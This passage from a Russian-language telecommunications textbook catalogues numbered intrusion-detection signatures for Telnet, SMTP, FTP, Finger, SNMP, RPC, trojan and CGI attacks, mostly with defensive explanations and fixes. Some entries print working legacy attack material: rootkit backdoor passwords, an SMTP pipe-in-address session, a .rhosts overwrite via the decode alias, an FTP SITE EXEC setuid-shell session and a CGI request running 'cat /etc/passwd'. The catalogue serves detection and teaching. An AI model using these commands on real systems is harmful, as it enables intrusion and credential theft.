Телекоммуникационные технологии. Том 1



         

Tableshtml - часть 12


2000911

Telnet bad TERMCAP.

2000912

Telnet XDISPLOC.

2000913

Telnet AUTH USER overflow.

2000914

Telnet ENV overflow.

2000915

Telnet login name well known.

2000916

Telnet Backdoor. Атакер пытается воспользоваться известным именем/паролем "задней" двери telnet Trigger. Протокольный анализатор извлекает login name и пароль из входной строки Telnet и сравнивает их со списком известных параметров доступа для задней двери telnet. Некоторые из них приведены ниже:

wh00t! Пароль задней двери предоставляемый rootkit для Linux, разработанного в 1994 .
lrkr0x Пароль задней двери предоставляемый Rootkit I для Linux, разработанного в 1996
satori Rootkit IV для Linux.
rewt Задняя дверь пользовательского аккоунта, которая предоставляет root-привилегии.
h0tb0x Пароль задней двери для FreeBSD rootkit 1.2 (1/27/97).

2001000

SMTP Attack.

2001001

SMTP pipe in mail address. кто-то пытается компрометировать e-mail сервер путем посылки исполняемого кода shell внутри e-mail адреса. Это имеет целью компрометировать e-mail сервер, а также субсистему, обрабатывающую заголовки почтового сообщения. Ниже приводится пример SMTP-сессии с попыткой реализации такой атаки:

HELO

MAIL FROM: |/usr/ucb/tail|/usr/bin/sh

RCPT TO: root

DATA

From: attacker@example.com

To: victim@example.com

Return-Receipt-To: |foobar

Subject: Sample Exploit

2001002

SMTP DEBUG command. Кто-то сканирует вашу систему с целью выявления ее уязвимости. В 1988, червь Morris уложил Интернет Internet. Одним из путей распространения червя являлась программа sendmail. Sendmail поддерживала нестандартную команду "DEBUG", которая позволяет любому получить контроль над сервером. Червь Morris автоматизировал этот процесс для распространения через системы sendmail Internet. Сейчас маловероятно, что вы найдете такую старую почтовую систему. Следовательно, такая атака будет означать, что кто-то использует универсальный сканер уязвимости. Иногда система может выйти из синхронизма (сбой в ISN), что вызывает большие потери пакетов. В таких условиях по ошибке может быть запущена команда DEBUG. Например, если вы работаете с версией сервера для системы 486, который обрабатывает большое количество e-mail, такая десинхронизация может произойти. Уязвимой системой является Sendmail/5.5.8.

2001003

SMTP login name overflow.

2001004

SMTP EXPN command.

2001005

SMTP VRFY command.

2001006

SMTP WIZ command.

2001007

SMTP Too many recipients.

2001008

SMTP corrupted MAIL command.

2001009

SMTP email name overflow.

2001010

SMTP corrupted RCPT command.

2001011

SMTP relay attempt. Предпринята попытка использования SMTP в качестве ретранслятора сообщений - это может случиться, когда спамер некорректно использует SMTP-сервер. Это одна из наиболее успешных атак на Internet. Спамер регулярно ищет в Интернет ретранслирующие e-mail сервера. Примерно половина всех e-mail серверов поддерживают ретрансляцию в той или иной форме.

2001012

SMTP command overflow.

2001013

SMTP mail to decode alias. Обнаружено сообщение, адресованное пользователю с именем decode. Это может быть попыткой взломать почтовый сервер, или это может быть частью сканирования системы. Это достаточно старый трюк, выявленный в 1990. Системы UNIX позволяют посылать почту клиенту с именем decode, чтобы передать сообщение не клиенту, а программе uudecode. Атакер может попытаться таким образом переписать файлы таким образом, чтобы проникнуть в систему. Эта дырка связана с файлом /etc/aliases, содержащим строку типа:

decode: |/usr/bin/uudecode

Сейчас, такой тип вторжения может проявиться лишь в случае универсального сканирования с целью выявления уязвимости вашей системы. Например, атакер пытается передать по каналу uuencoded-файл после команды DATA. HELO

MAIL FROM: test@example.com

RCPT TO: decode

DATA

begin 644 /usr/bin/.rhosts

$*R`K"@``

`

end

.

QUIT

Этот пример пытается атаковать систему путем записи строки "+ +" в файл ".rhosts". Это будет указывать системе, что следует доверять любому, кто вошел в нее через программу типа 'rlogin'. Этот вид атаки существенен только для почтовых серверов, работающих под UNIX. Просмотрите файл "aliases", размещенный в /etc/aliases. Проверьте, нет ли строк типа:

decode: |/usr/bin/uudecode

uudecode: |/usr/bin/uuencode -d

Удалите эти строки. Заметим, что новые системы не допускают такой возможности.

2001014

SMTP mail to uudecode alias.

2001015

SMTP too many errors.

2001016

SMTP MIME file name overflow.

2001017

SMTP uucp-style recipient.

2001018

SMTP encapsulated relay.

2001019

STMP encapsulated Exchange relay. Spam-атака. Выявляется инкапсулируемый почтовый адрес вида . Некоторые версии Microsoft Exchange не способны проверять эти типы адресов, таким образом, они могут использоваться спамерами для посылки неавторизованной почты.

2001020

SMTP mail to rpmmail alias.

2001021

SMTP MIME name overflow.

2001022

SMTP MIME filename repeated chars.

2001023

SMTP MIME filename repeated blanks.

2001024

SMTP ETRN overflow.

2001025

SMTP Date overflow.

2001026

SMTP Recipient with trailing dot.

2001027

SMTP FROM: field overflow.

2001028

SMTP MIME null charset.Обнаружено незнакомое почтовое сообщение, вероятно сконструированное, чтобы разрушить почтовый сервер. В заголовки "Reply-To:" сообщения встраиваются исполняемые Shell и PERL коды. Когда система откликается, эти коду будут исполнены. Например, старые версии list-сервера MAJORDOMO исполняют любой PERL-скрипт, который вставлен в это поле.

2001030

SMTP ENVID overflow.

2001031

SMTP false attachment.

2001032

SMTP Expn Overflow.

2001033

SMTP Vrfy Overflow.

2001034

SMTP Listserv Overflow.

2001036

SMTP Auth Overflow.

2001040

SMTP Xchg Auth.

2001041

SMTP Turn.

2001101

Finger.

2001102

Finger forwarding. Предпринята попытка использования программы finger для переадресации запроса другой системе. Это часто делается атакерами, чтобы замаскировать свою идентификацию. Finger поддерживает рекурсивные запросы. Запрос типа "rob@foo@bar" просит "bar" сообщить информацию о "rob@foo", заставляя "bar" послать запрос "foo". Эта техника может использоваться для сокрытия истинного источника запроса. Finger является опасным источником информации и по этой причине должен быть заблокирован в /etc/inetd.conf.

2001103

Finger forwarding overflow.

2001104

Finger command.

2001105

Finger list.

2001106

Finger filename.

2001107

Finger overflow.

2001108

Finger search. Демон "cfinger" позволяет осуществлять поиск любых или всех имен пользователей, при вводе "search.*". Эта возможность поиска предоставляет атакеру легкий способ пронумеровать всех пользователей системы. Широкополосные сканеры (напр. CyberCop Scanner, ISS Scanner) осуществляют сканирование этого типа. Сигнатурой для этого вида атаки является наличие строки "search.*" в качестве имени пользователя.

2001109

Finger Backdoor. Кто-то пытается повторно войти в систему через известную заднюю дверь в finger. Раз система была компрометирована, атакеры могу оставит для себя открытую "потайную" дверь, через которую они смогут войти, когда захотят. Например, одна потайная дверь допускает посылку finger команды "cmd_rootsh", которая открывает shell с привилегиями суперпользователя. Заметим, что если потайная дверь действительно имеется, ваша система уже была скомпрометирована. В настоящее время, все известные потайные двери finger существуют только в системах UNIX. Если вы столкнулись с такой проблемой то, во-первых, просмотрите информацию откликов, которая может быть в наличии. Если вы обнаружили какие-то уведомления об ошибках, то вероятно попытка вторжения не была успешной (но не обольщайтесь). Во-вторых, если вы озабочены возможностью наличия потайной двери в системе, исполните команду finger сами. Чтобы устранить уязвимость данного вида, следует, во-первых, рассмотреть возможность удаления услуги finger вообще. Это опасная услуга, которая предоставляет полезную информацию атакерам. Во-вторых, если вы чувствуете, что система компрометирована, следует заново инсталлировать операционную систему. Поищите потайную дверь в списке пользователей. Трудно представить, что какой-то пользователь в вашей системе имеет имя "cmd_shell". Многие широкодиапазонные сканеры ищут такие потайные двери.

2001110

Finger Scan. Производится сканирование известных из Finger имен пользователей с целью получения персональной информации. Например, если вы направляете запрос finger "jsmith", вы вероятно ищите данные о "Jane Smith". В безопасных сетях, любое использование finger подозрительно, так как оно может раскрыть важную информацию о пользователе. Однако, существует в системе большое число не пользовательских аккоунтов, таких как "adm", "bin" или "demo". Попытки Finger обратиться к этим аккоунтам указывают, что кто-то использует протокол finger для того, чтобы сканировать сервер с целью получения более существенной информации. В настоящее время, finger работает на UNIX-системах. Чтобы забыть об этих проблемах, заблокируйте finger. Если он работает, атакеры могут получить нужные им данные, а за помощь им вам не платят.

2001111

Finger Enumeration. Зафиксированы подозрительные команды finger. Finger используется для поиска информации о пользователях. Некоторые системы допускают множественный поиск пользователей. Здесь возможны некорректности. Например, запрос finger о пользователе с именем "e" выдаст список всех пользователей в системе, содержащими "e" в своем имени. Некоторые системы finger допускают также спецификацию множественных имен. Это означает, что finger для "a b c d e f...x y z" перечисляет всех пользователей в системе. В настоящее время, finger работает в основном на системах UNIX. Чтобы забыть об этих проблемах, заблокируйте finger. Если он работает, атакеры могут получить нужные им данные.

2001201

TFTP file not found.

2001202

TFTP file name overflow.

2001203

TFTP Traversal.

2001204

TFTP Exe Transfer.

2001205

TFTP Web Transfer.

2001206

TFTP Echo Bounce.

2001301

FTP invalid PORT command. Если вы такое обнаружили, это означает, что совершается попытка вторжения в вашу FTP-систему. Немногие ЭВМ допускают такую атаку. Команда "PORT" является частью протокола FTP но обычно незаметна для пользователя, хотя он часто и получает статусные сообщения "PORT command successful". Это уведомляет противоположную сторону о том, кода следует направлять данные. Эта команда форматируется в виде списка из 6 чисел, разделенных запятыми. Например:

PORT 192,0,2,63,4,01

Данная команда сообщает противоположной стороне, что данные следует отправлять по адресу 192.0.2.63, порт 1025. Если эта команда искажена, то вероятно атакер пытается компрометировать FTP-сервис. Однако, так как большинство FTP-сервисов противостоит этому типу атаки, шансов у хакера в этом варианте немного.

2001302

FTP PORT bounce to other system.

2001303

FTP PORT restricted.

2001304

FTP CWD ~root command.

2001305

FTP SITE EXEC command. Старые версии FTP-серверов поддерживают эту команду, которая разрешает нежелательный доступ к серверу. В версиях wu-ftpd ниже 2.2, имеется возможность исполнения программы (об этом хакер может только мечтать) . Ниже показана сессия, где "robert" имеет легальный аккоунт в системе и пытается реализовать режим строчно-командного доступа к shell.

220 example.com FTP server (Version wu-2.1(1) ready.

Name (example.com:robert): robert

331 Password required for robert.

Password: foobar

230 User robert logged in.

Remote system type is UNIX.

Using binary mode to transfer files.

ftp> quote "site exec cp /bin/sh /tmp/.runme"

200-cp /bin/sh /tmp/runme

ftp> quote "site exec chmod 6755 /tmp/.runme"

200-chmod 6755 /tmp/runme

ftp> quit

221 Goodbye.

Теперь пользователь авторизован и может работать с shell на уровне привилегий root в каталоге /tmp.

2001306

FTP USER name overflow.

2001307

FTP password overflow.

2001308

FTP CWD directory overflow.

2001309

FTP file name overflow.

2001310

FTP command line overflow.

2001311

FTP pipe in filename. Совершена попытка исполнить программу на FTP-сервере. Допускающее это ошибка имеется во многих FTP-демонах около 1997, таких что, если перед именем файла присутствует символ PIPE (|), сервер пытается исполнить программу имя которой следует за ним. Так как FTP-сервер обычно работает с привилегией root, может произойти его компрометация. Проверьте, что у вас работает новейшая версия сервера.

2001312

FTP MKD directory overflow.

2001313

ProFTPD snprintf exploit.

2001314

FTP SITE PSWD exploit.

2001315

FTP compress exec exploit.

2001316

FTP file exec exploit.

2001317

FTP command too long.

2001318

FTP data too long.

2001319

FTP NLST directory overflow.

2001320

FTP SITE ZIPCHK metacharacters.

2001321

FTP SITE ZIPCHK buffer overflow.

2001322

FTP SITE EXEC exploit.

2001323

FTP PrivilegedBounce.Кто-то пытается нарушить безопасность FTP-сервиса, чтобы сканировать другие ЭВМ. Если атака FTP используется при одновременной спецификации привилегированного порта, можете не сомневаться - это сетевая атака. Возможно, что FTP-переадресация на непривилегированный порт является результатом FTP-прокси. По этой причине комбинированная атака рассматривается как отдельная сигнатура. Это позволяет атакеру маскировать свою сетевую идентичность. Возможно также, что атакер, используя эту технику, может обойти некоторые плохо конфигурированные фильтры пакетов или firewalls. Например, если ваш mail-сервер допускает соединения посредством telnet с вашим внутренним FTP-сервером, а с внешними ЭВМ из Internet не допускает, атакер сможет соединиться с вашим telnet-портом на вашем SMTP методом переадресации через ваш FTP-сервер. К системам допускающим такую атаку относятся SunOS 4.1.x, Solaris 5.x, большинство систем, работающих со старыми FTP-серверами. Чтобы покончить с такого рода угрозой раз и навсегда. Просмотрите, какие ЭВМ и порты вовлечены в этот процесс. Если это ваши ЭВМ, проконтролируйте, как это реализовано. Если же это не ваша ЭВМ, убедитесь, что администратор этой машины, видит, что в соединении участвует ваш FTP-сервер, и если атака осуществлена, ваша машина будет выглядеть, как источник этой атаки. Вы можете провзаимодействовать с этим администратором или по крайней мере записать logs оригинального источника атаки. После этих дипломатических шагов вам следует установить новую версию FTP-сервера, где данная ошибка исправлена, например, wu-ftpd 2.4.2 beta 15 или более новую.

2001324

FTP Site Exec DotDot. Попытка неавторизованного доступа. Некоторые версии wu-ftpd позволяют использовать команду site exec для удаленных машин. Путем предоставления прохода с определенными параметрами, удаленный пользователь может исполнить произвольные команды на FTP-сервере. Эта атака позволяет атакующему выполнять команды на атакуемой машине. Это может привести к получению им доступа root-уровня. Такой дефект имеют системы wu-ftpd 2.4.1 и ранее. Чтобы защитить себя от таких атак, просмотрите команды, которые атакер использовал. Если они представляют угрозу для атакуемой ЭВМ, можете считать машину скомпрометированной. Обновите программное обеспечение FTP-сервера или замените его вообще.

2001325

FTP Site Exec Format Attack.

2001326

FTP Site Exec Tar.

2001327

FTP Site Chown Overflow.

2001328

FTP AIX Overflow.

2001329

FTP HELP Overflow.

2001330

FTP Glob Overflow.

2001331

FTP Pasv DoS.

2001332

FTP Mget DotDot.

2001401

RWHO host name overflow.

2001501

Back Orifice scan. Кто-то сканирует вашу систему на предмет троянского коня "Back Orifice". Back Orifice сканы наиболее частые атаки, встречающиеся в Internet. Ваша машина просканирована, но еще не выбрана для атаки. Это означает, что хакер сканирует тысячи ЭВМ в Interent, надеясь найти одну, которая была скомпрометирована посредством Back Orifice. Хакер не обязательно охотится именно на вашу ЭВМ. Большинство взломов происходит путем установки хакером инфицированных программ или документов в Internet в надежде, что какой-то неосторожный клиент скопирует и запустит их у себя. Хакер сканирует затем Internet и ищет эти скомпрометированные ЭВМ. Но даже, если ваша машина была скомпрометирована программой Back Orifice, ваша субсистема firewall может заблокировать доступ к ней.

2001502

Netbus response.

2001503

Quake backdoor.

2001504

HP Remote watch.

2001505

Back Orifice response.

2001506

Back Orifice ping.

2001507

PCAnywhere ping. Кто-то пингует систему для того чтобы проверить, работает ли PCAnywhere. Это может быть атака, но может быть и случайный инцидент. PCAnywhere является продуктом Symantec, который позволяет осуществить удаленное управление ЭВМ. Она является очень популярной в Internet для этих легальных целей, позволяя администраторам удаленно контролировать серверы. Хакеры часто сканируют Internet с целью поиска машин, поддерживающих этот продукт. Многие пользователи используют пустые пароли или пароли, которые легко угадать (например слово "password"). Это предоставит легкий доступ хакеру. Если хакер захватил контроль над машиной, он не только могут украсть информацию, но и использовать эту машину для атаки других ЭВМ в Интернет. Случайные сканирования клиентами PCAnywhere обычно видны со стороны соседей. Программа инсталлирует иконку, названную "NETWORK", которая сканирует локальную область. Хотя эти сканы не содержат враждебных намерений, они могут создавать дискомфорт. Чтобы проверить, что на самом деле имеет место, следует рассмотреть IP-адрес атакер. Если IP-адрес относится к локальному сегменту (т.e. подобен вашему IP-адресу), тогда ничего страшного. В противном случае (адрес внешний) - имеет место атака вашей системы. PCanywhere сканирует то, что называется диапазоном "класса C", например, 192.0.2.0 - 192.0.2.255. Если вы не работаете с PCAnywhere, тогда проблем нет. В противном случае, читайте советы по обеспечению безопасности сервера PCAnywhere.

2001508

ISS Ping Scan.

2001509

ISS UDP scan.

2001510

Cybercop FTP scan.

2001511

WhatsUp scan.

2001512

Back Orifice 2000 ping.

2001513

Back Orifice 2000 auth.

2001514

Back Orifice 2000 command.

2001515

Back Orifice 2000 response.

2001517

Scan by sscan program.

2001518

phAse Zero trojan horse activity. Возможная попытка вторжения. Программа phAse Zero обладает всеми стандартными особенностями троянского коня, включая возможность выгружать и загружать файлы в ЭВМ с помощью FTP, исполнять программы, стирать и копировать файлы, а также читать и записывать в конфигурационную базу данных (registry). Здесь имеется функция 'Trash Server', которая удалит все файлы из каталога вашей системы Windows. phAse Zero работает под Windows 95, 98 и Windows NT.

2001519

SubSeven trojan horse activity.

2001520

GateCrasher trojan horse activity.

2001521

GirlFriend trojan horse activity.

2001522

EvilFTP trojan horse activity. Неавторизованная попытка вторжения. Троянский конь EvilFTP является одним из многих программ подобного рода, который может использовать атакер для доступа к вашей компьютерной системы без вашего ведома. Когда программа, содержащая троянского коня работает, EvilFTP инсталлирует FTP-сервер на порт12346 с login "yo" паролем "connect." Этот троянский конь при инсталляции в удаленной системе позволяет атакеру выгружать и загружать файлы для системы, где он инсталлирован.

2001523

NetSphere trojan horse activity.

2001524

Trinoo Master activity.

2001525

Trinoo Daemon activity.

2001526

NMAP ping. Для проверки вашей системы на уязвимость используется программа NMAP. NMAP -очень популярная программа, используемая хакерами для сканирования Internet. Она работает под Unix, и имеет много конфигурационных опций и использует несколько трюков, чтобы избежать детектирования системами, детектирующими вторжение. NMAP не позволяет хакеру вторгнуться в систему, но допускает получение им полезной информации о конфигурации системы и доступных услугах. Программа часто используется как прелюдия более серьезной атаки.

2001527

NetSphere Client. Активность клиента NetSphere. Это указывает, имеется пользователь в вашей сети, который применил NetSphere для хакерства. Это не должно быть заметно клиентам, если только они сами не работают с NetSpheres.

2001528

Mstream agent activity.

2001529

Mstream handler activity.

2001530

SubSeven password-protected activity.

2001531

Qaz trojan horse activity.

2001532

LeakTest trojan horse activity.

2001533

Hack-a-tack trojan horse activity.

2001534

Hack-a-tack trojan horse ping.

2001535

Bionet trojan horse activity.

2001536

Y3K trojan horse ping.

2001537

Y3K trojan horse activity.

2001601

FTP login failed.

2001602

HTTP login failed.

2001603

IMAP4 login failed.

2001604

POP3 login failed.

2001605

rlogin login failed.

2001606

SMB login failed.

2001607

SQL login failed.

2001608

Telnet login failed.

2001609

SMTP login failed.

2001610

PCAnywhere login failed.

2001611

SOCKS login failed.

2001612

VNC login failed.

2001701

rpc.automountd overflow.

2001702

rpc.statd overflow.

2001703

rpc.tooltalkd overflow.

2001704

rpc.admind auth.

2001705

rpc.portmap dump.

2001706

rpc.mountd overflow.

2001707

RPC nfs/lockd attack.

2001708

rpc.portmap.set.

2001709

rpc.portmap.unset.

2001710

rpc.pcnfs backdoor.

2001711

rpc.statd dotdot file create.

2001712

rpc.ypupdated command.

2001713

rpc.nfs uid is zero.

2001714

rpc.nfs mknod.

2001715

rpc.nisd long name.

2001716

rpc.statd with automount.

2001717

rpc.cmsd overflow.

2001718

rpc.amd overflow.

2001719

RPC bad credentials.

2001720

RPC suspicious credentials.

2001721

RPC getport probe.

2001722

rpc.sadmind overflow.

2001723

rpc.SGI FAM access.

2001724

RPC CALLIT unknown.

2001725

RPC CALLIT attack.

2001726

RPC CALLIT mount.

2001727

rpc.bootparam whoami mismatch.

2001728

RPC prog grind.

2001729

RPC high-port portmap.

2001730

RPC ypbind directory climb.

2001731

RPC showmount exports.

2001732

RPC selection_svc hold file.

2001733

RPC suspicious lookup.

2001734

RPC SNMPXDMID overflow.

2001735

RPC CALLIT ping.

2001736

RPC yppasswdd overflow.

2001737

rpc.statd Format Attack.

2001738

RPC Sadmind Ping.

2001739

RPC Amd Version.

2001801

IRC buffer overflow.

2001802

SubSeven IRC notification.

2001803

IRC Trinity agent.

2001804

Y3K IRC notification.

2001901

IDENT invalid response. Чужой сервер пытается использовать identd клиента. Многие программы осуществляют реверсивные lookups IDENT. Эти программы уязвимы к атакам, когда сервер присылает некорректный отклик.

2001902

IDENT scan.

2001903

IDENT suspicious ID.

2001904

IDENT version.

2001905

IDENT newline.

2002001

SNMP Corrupt.

2002002

SNMP Crack. Обнаружено большое число строк community (паролей), которые индицируют попытку вскрыть систему контроля паролей. Большое число сообщений SNMP с различными строками community за ограниченный период времени должны рассматриваться как подозрительная активность, и как попытка подобрать корректное значение поля community. SNMP(Simple Network Management Protocol) используется для мониторирования параметров оборудования. Однако, это крайне небезопасный протокол, и ничто не препятствует простому подбору пароля путем простого перебора. Следует конфигурировать систему так, чтобы она была доступна со стороны ограниченного числа машин. Рекомендуется также использовать максимально возможно длинные строки community, что позволит зарегистрировать подбор до того, как он успешно завершится.

2002003

SNMP backdoor. Атакер пытается использовать известную "потайную дверь" сетевого оборудования. Однако, многие приборы имеют пароли для "потайной двери", которые могут использоваться для обхода нормальных проверок, предусмотренных нормальной системой обеспечения безопасности. Скрытые и недокументированные строки community имеются во многих субагентах SNMP, которые могут позволить атакерам поменять важные системные параметры. Удаленные атакеры могут убить любой процесс, модифицировать маршруты, или заблокировать сетевые интерфейсы. Важно то, что атакер может выполнить апосредовано произвольные команды, требующие привилегий суперюзера.

2002004

SNMP discovery broadcast. Атакер посылает команду SNMP GET по широковещательному адресу. Это может быть попыткой определить, какие системы поддерживают различные возможности SNMP. Это часто дает полную информацию об управляемом приборе, и иногда может предоставить полный контроль над прибором. В то же время, SNMP крайне небезопасный протокол, с легко угадываемым паролем. В результате, он является популярным протоколом для хакеров.

2002005

SNMP sysName overflow.

2002006

SNMP WINS deletion. Совершена попытка стереть записи WINS через интерфейс SNMP сервера. Это может быть попытка реализовать Denial-of-Service (DoS) или просканировать систему безопасности. Клиенты Windows контактируют с системой WINS для того, чтобы найти серверы. Многие системы уязвимы для атак при помощи SNMP-команд, посланных серверу для того, чтобы стереть записи. Это не взламывает сервер, но после стирания записи в базе данных, клиенты и серверые смогут более найти друг друга. Однако этот отказ обслуживания (DoS) может предварять другие атаки. Это может быть частью широко диапазонного сканирования с целью поиска слабых точек в сети. Эта атака может быть против систем, где нет работающих SNMP или WINS.

2002007

SNMP SET sysContact. Совершена попытка удаленно установить поле sysContact через SNMP. Это вероятно сканирование уязвимых мест вашей системы. Группа SNMP "system" используется всеми MIB. Она часто сканируется хакерами при предварительной разведке. Одним из способов сканирования является выполнение команд SET для поля "sysContact" для того, чтобы просмотреть, реагирует ли какая-либо система. Такие SET часто используют для взлома хорошо известные пароли/communities.

2002008

SNMP lanmanger enumeration.

2002009

SNMP TFTP retrieval.

2002010

SNMP hangup. Совершена попытка подвесить пользователя коммутируемой телефонной сети с помощью протокола SNMP. Некоторые типы сетевого оборудования (Ascend, Livingston, Cisco, etc.) могут допускать такое подвешивание пользователей. Это может быть обычным отказом обслуживания (DoS) в chat-комнатах и при играх в реальном времени. Один участник в chat-комнате может не любить другого. Он может взять IP-адрес жертвы, затем осуществлять поиск, пока не найдут прибор доступа, через который подключен клиент телефонной сети.

2002011

SNMP disable authen-traps. Совершена попытка заблокировать трэпы неудач SNMP-аутентификации, возможно с целью замаскировать активность хакера. Если строка community некорректна, прибор может послать на консоль управления трэп "authentication-failure". Эти строки community не управляют доступом всего SNMP-агента MIB. Вместо этого, они управляют "видами" MIB: различные строки community могут позволять управление различными частями MIB. Предположим сценарий, где атакер желает взломать строку community, отвечающую за секцию MIB поставщика. Это включает множество (возможно миллионы) попыток выяснить правильный пароль. Следовательно, чтобы избежать оповещений об атаке, нападающий должен заблокировать трэпы, которые могут поступить на консоль.

2002012

SNMP snmpdx attack. Совершена попытка заменить Sun Solstice Extension Agent, используя SNMP. Это может быть попытка вскрыть систему. Sun Solaris 2.6 поставляется со встроенной SNMP. В этот пакет входит возможность "extension agents": агенты, которые подключены к первичному SNMP-агенту для управления другими частями системы. Следует просмотреть log-book b jndtnbnm на вопросы:

Имеется ли платформа управления, которая может выполнять подобные операции? Является ли строка "community" одной из "печально" известных для Solaris (в особенности "all private")? Параметр "val" содержит имя программы, которая будет исполнена. Выглядит ли это как демон или выглядит ли она как программа, предназначенная для компрометации системы? Типичными вариантами компрометации является создание xterm или скрипта, который изменяет /etc/passwd.

2002013

SNMP 3Com communities. Совершена попытка прочесть строку community/пароля устройства 3Com с помощью SNMP. Это может быть попыткой проникновения в систему. Многие старые версии оборудования 3Com содержат дефекты, которые делают строку community/пароля общедоступной. Атакер, чтобы получить пароли, может прочесть специфические таблицы, используя строку community+"public". После этого атакер получает полный контроль над прибором. Такого рода атаки возможны для хабов 3Com SuperStack II версий ранее 2.12, карт HiPer Arc, с кодами выпуска ранее 4.1.59.

2002014

SNMP dialup username.

2002015

SNMP dialup phone number.

2002016

SNMP scanner.

2002017

SNMP passwd.

2002018

SNMP community long.

2002019

SNMP echo bounce. Обнаружен пакет UDP путешествующий между портами SNMP и ECHO. Техника, которая иногда используется, заключается в том, что пакеты SNMP посылаются службе ECHO промежуточной системы. IP-адрес отправителя фальсифицируется так, чтобы ECHO посылалось службе SNMP атакуемой системы. Атакуемый объект доверяет промежуточной системе и поэтому принимает пакет.

2002020

SNMP HP Route Metachar.

2002101

rlogin -froot backdoor.

2002102

rlogin login name overflow.

2002103

rlogin password overflow.

2002104

rlogin TERM overflow.

2002105

Rlogin login name well known.

2002201

Melissa virus.

2002202

Papa virus.

2002203

PICTURE.EXE virus.

2002204

W97M.Marker.a virus.

2002205

ExploreZip worm.

2002206

Keystrokes monitored.

2002207

PrettyPark worm.

2002208

ILOVEYOU worm.

2002209

Worm extensions.

2002210

Worm address.

2002301

Duplicate IP address.

2002401

NNTP name overflow.

2002402

NNTP pipe seen.

2002403

NNTP Message-ID too long.

2002500

Suspicious URL.

2002501

bat URL type.

2002502

cmd URL type.

2002503

CGI aglimpse. Совершена попытка исполнить программу aglimpse, которая имеет известные уязвимости. Атакер сканирует web-сервер системы и ищет потенциальные уязвимости в секции web-сервера "dynamic content generation" (динамическая генерация содержимого). Эта утилита web-сервера исполняет отдельную программу для генерации web-страниц, когда пользователи осуществляют доступ к сайту. Существует сотни таких программ, которые содержат ошибки в сфере безопасности. В данном примере, хакер просматривает web-сервер и ищет одну из таких программ. Большая часть того, что вы читали в новостях о хакерских "штучках", является описанием слабостей таких программ и повреждений web-сайта. Особенно много информации можно найти о слабостях cgi-bin. Если скрипт виден внешнему миру, вам следует удалить его из данного каталога. Следует также удалить все динамическое содержимое, которое не является абсолютно необходимым для работы web-сайта. Выполните двойную проверку скриптов, которые вы действительно используете, на предмет наличия в них брешей уязвимости. Данная атака является стандартной, использующей метасимвольный CGI на PERL. Программа PERL передает "поврежденный" ввод пользователя непосредственно в интерпретатору shell.

2002504

CGI AnyForm2. Совершена попытка исполнить программу anyform2, которая имеет известную уязвимость. Программа AnyForm cgi-bin содержит уязвимость, которая позволяет удаленному атакеру исполнять программы Web-сервера. Атакер сканирует web-сервер системы и ищет потенциальные уязвимости в секции web-сервера "dynamic content generation" (динамическая генерация содержимого). Эта утилита web-сервера исполняет отдельную программу для генерации web-страниц, когда пользователи осуществляют доступ к сайту. Существует сотни таких программ, которые содержат ошибки в сфере безопасности. В данном примере, хакер просматривает web-сервер и ищет одну из таких программ.

2002505

CGI bash. Совершена попытка исполнить скрипт bash, который в случае успеха, позволит хакеру получить доступ к серверу. Это программа shell, которая может исполнять произвольные операции на сервере. Если она была случайно помещена в удаленно доступный каталог, и, если вы обнаружили, что какие-то параметры системы стали доступны хакеру, считайте свою систему скомпрометированной. Вы должны немедленно удалить эту программу из данного каталога, проверить систему на наличие троянских коней и проконтролировать, не изменялась ли ее конфигурация.

2002506

CGI campas. Совершена попытка исполнить campas, которая имеет известную уязвимость. Это известный скрипт, поставляемый с оригинальными web-серверами NCSA. Он оказался весьма популярным среди хакеров (вместе с phf), но в настоящее время его важность незначительна. Эта точка уязвимости позволяет удаленному атакеру исполнять команды на ЭВМ Web-сервера, как если бы он работал на самой машине, где размещен httpd. Эта уязвимость разрешает доступ хакеру к файлам web-сервера. При определенных конфигурациях web-сервера возможно получение хакером административного доступа к ЭВМ.

2002507

CGI convert.bas.

2002508

CGI csh.

2002509

CGI faxsurvey.

2002510

CGI finger. Произведена попытка исполнить программу finger, который может позволить хакеру неавторизованный доступ к серверу. Атакер сканирует web-сервер системы и ищет потенциальные точки уязвимости в секции "dynamic content generation". Эта утилита web-сервера исполняет отдельную программу для генерации web-страниц, когда пользователь получает доступ к сайту. Существуют сотни таких программ, которые имею окна уязвимости. в данном примере, хакер просматривает web-сервер и ищет одну из таких уязвимых программ. Дополнительную информацию можно найти в cgi-bin exploits. Если этот скрипт виден внешнему миру, его следует удалить из данного каталога. Следует удалить также все динамические данные, которые совершенно необходимы для работы web-сайта.

2002511

CGI formmail.

2002512

CGI formmail.pl.

2002513

CGI glimpse. Попытка исполнения программы glimpse, которая известна своими уязвимостями. Эти уязвимости позволяют атакеру исполнять команды на ЭВМ Web-сервера во время работы процесса пользователя в httpd. В зависимости от конфигурации web-сервер, это может позволить атакеру получит root или административный доступ к ЭВМ. В любом случае, атакер сможет изменить содержимое web-сайта.

2002514

CGI guestbook.cgi.

2002515

CGI guestbook.pl.

2002516

CGI handler. Попытка исполнения CGI-хандлера, который обладает известными слабостями Эта CGI-программа является частью "Outbox Environment" в системах SGI IRIX. Программа может использоваться для выполнения любой команды на web-сервере. Для того, чтобы реализовать это, используйте программу Telnet следующим образом:

telnet www.example.com 80

GET /cgi-bin/handler/useless_shit;cat /etc/passwd|?data=Download HTTP/1.0

Используйте символ TAB, чтобы ввести пробел в пределах команды.

2002517

CGI htmlscript.

2002518

CGI info2www.

2002519

CGI machineinfo.

2002520

CGI nph-test-cgi.

2002521

CGI perl. Произведена попытка исполнить perl-скрипт, который позволит хакеру неавторизованный доступ к серверу. Это программа shell, которая может выполнить произвольные операции на сервере. Если эта программа случайно помещена в удаленно доступный каталог, и, если выявлена модификация некоторого системного параметра, можете считать свою систему скомпрометированной. Вам следует немедленно удалить программу из ее каталога и поместить в более подходящее место, проверьте вашу систему на наличие троянских коней, а также проконтролируйте конфигурацию на предмет возможных модификаций.

2002522

CGI perl.exe. Произведена попытка исполнить perl.exe, которая позволит хакеру неавторизованный доступ к серверу. Это программа shell, которая может выполнить произвольные операции на сервере. Если эта программа случайно помещена в удаленно доступный каталог, и, если выявлена модификация некоторого системного параметра, можете считать свою систему скомпрометированной. Вам следует немедленно удалить программу из ее каталога и поместить в более подходящее место, проверьте вашу систему на наличие троянских коней, а также проконтролируйте конфигурацию на предмет возможных модификаций.

2002523

CGI pfdispaly.cgi.

2002524

CGI phf.

2002525

CGI rguest.exe.

2002526

CGI wguest.exe.

2002527

CGI rksh.

2002528

CGI sh.

2002529

CGI tcsh.

2002530

CGI test-cgi.tcl.

2002531

CGI test-cgi.

2002532

CGI view-source.

2002533

CGI webdist.cgi.

2002534

CGI webgais.

2002535

CGI websendmail.

2002536

